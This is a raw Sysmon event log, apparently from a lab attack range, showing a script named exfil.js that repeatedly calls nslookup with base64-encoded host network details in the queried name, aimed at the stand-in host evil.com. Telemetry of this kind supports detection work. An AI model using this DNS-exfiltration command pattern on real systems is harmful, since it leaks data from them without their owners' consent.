14:21:32.959{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-D043-000000005F02}8140C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.959{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-D043-000000005F02}8140C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.959{2E1864BB-18EC-629A-D043-000000005F02}81402244C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-CF43-000000005F02}7524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.944{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-D043-000000005F02}8140C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.944{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-CF43-000000005F02}7524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.944{2E1864BB-18E0-629A-6742-000000005F02}39763084C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-CF43-000000005F02}7524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.949{2E1864BB-18EC-629A-CF43-000000005F02}7524C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqwt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.944{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlixfjp.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.912{2E1864BB-18EC-629A-CD43-000000005F02}81282104C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-CE43-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.912{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-CE43-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.912{2E1864BB-18EC-629A-CC43-000000005F02}44847664C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-CE43-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.921{2E1864BB-18EC-629A-CE43-000000005F02}6984C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-CC43-000000005F02}4484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlixfjp.tmp 2>&1 10341000x8000000000000000209301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.897{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-CD43-000000005F02}8128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.897{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-CD43-000000005F02}8128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.897{2E1864BB-18EC-629A-CD43-000000005F02}81282104C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-CC43-000000005F02}4484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.881{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-CD43-000000005F02}8128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.881{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.881{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.881{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.881{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.881{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-CC43-000000005F02}4484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.881{2E1864BB-18E0-629A-6742-000000005F02}39766864C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-CC43-000000005F02}4484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.883{2E1864BB-18EC-629A-CC43-000000005F02}4484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlixfjp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.859{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpmzilc.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000209289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.960{00000000-0000-0000-0000-000000000000}6032evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.865{00000000-0000-0000-0000-000000000000}4816evil.com0::ffff:127.0.0.1;<unknown process> 